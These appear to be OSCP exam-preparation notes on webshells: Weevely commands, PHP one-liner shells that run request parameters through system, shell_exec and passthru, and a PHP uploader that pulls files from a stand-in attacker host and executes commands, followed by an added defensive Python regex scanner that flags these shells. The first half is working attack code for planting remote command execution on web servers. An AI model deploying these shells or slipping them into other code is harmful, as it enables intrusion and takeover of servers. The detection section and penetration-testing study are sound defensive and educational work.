OSCP Notes

1 full webshells


Weevely

Generates webshells:

weevely generate password /tmp/payload.php

Then we connect to it with:

weevely http://192.168.1.2/location_of_payload password

kali

/usr/share/webshells/

2 lite webshells


PHP web shells

<?php system($_GET["cmd"]); ?>
<?php echo shell_exec($_GET['cmd']); ?>
<? passthru($_GET["cmd"]); ?>

php with upload

<?php
 if (isset($_REQUEST['fupload'])) {
  file_put_contents($_REQUEST['fupload'], file_get_contents("http://yourIP/" . $_REQUEST['fupload']));
 };
 if (isset($_REQUEST['cmd'])) {
  echo "<pre>" . shell_exec($_REQUEST['cmd']) . "</pre>";
 }
?>

The above can then be accessed with:

curl http://IP/shell.php?fupload=filename_on_your_webserver

If running whoami we get the error ‘standard in must be a tty’, we can try:

(sleep 1; echo password) | python -c "import pty; pty.spawn(['/bin/su','-c','whoami']);"
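
From the defender's side, a static check for the lite PHP shells and the upload variant listed above. This is an added example, not part of the original notes: the rule names, the `scan_php` function and the sample files are constructed for illustration, and the list of exec functions is an assumption to extend.

```python
import re

# Functions that pass a string to the OS shell: the three used in the notes
# above plus common siblings (assumption: extend this list for your estate).
EXEC = r"\b(?:system|shell_exec|passthru|exec|popen|proc_open)\s*\(\s*"
# Request-controlled input such as $_GET["cmd"] or $_REQUEST['fupload'].
TAINT = r"\$_(?:GET|POST|REQUEST|COOKIE)\s*\[[^\]]*\]"

RULES = {
    "request-to-exec": re.compile(EXEC + TAINT, re.I),
    "request-to-file-write": re.compile(r"\bfile_put_contents\s*\(\s*" + TAINT, re.I),
    "remote-fetch": re.compile(r"\bfile_get_contents\s*\(\s*[\"']https?://", re.I),
}
ASSIGN = re.compile(r"(\$\w+)\s*=\s*" + TAINT)


def scan_php(source):
    """Return the sorted names of the rules that fire on one PHP source string."""
    hits = {name for name, rx in RULES.items() if rx.search(source)}
    # One step of indirection: $c = $_POST['x']; passthru($c);
    for var in set(ASSIGN.findall(source)):
        if re.search(EXEC + re.escape(var) + r"\b", source, re.I):
            hits.add("request-to-exec")
    return sorted(hits)


# Constructed sample files: shapes taken from the notes above, plus a benign page.
SAMPLES = {
    "one_liner.php": '<?php system($_GET["cmd"]); ?>',
    "short_tag.php": '<? passthru($_GET["cmd"]); ?>',
    "indirect.php": "<?php $c = $_POST['x']; passthru( $c ); ?>",
    "uploader.php": """<?php
 if (isset($_REQUEST['fupload'])) {
  file_put_contents($_REQUEST['fupload'], file_get_contents("http://yourIP/" . $_REQUEST['fupload']));
 }
 if (isset($_REQUEST['cmd'])) { echo "<pre>" . shell_exec($_REQUEST['cmd']) . "</pre>"; }
?>""",
    "benign.php": "<?php $out = shell_exec('uptime'); echo htmlspecialchars($_GET['q']); ?>",
}

if __name__ == "__main__":
    for name, src in SAMPLES.items():
        print(f"{name:15} {scan_php(src) or 'clean'}")
```

A hard-coded command such as `shell_exec('uptime')` is not flagged; only request data reaching an exec or file-write call is. Obfuscated shells such as Weevely output need entropy or behavioural detection instead.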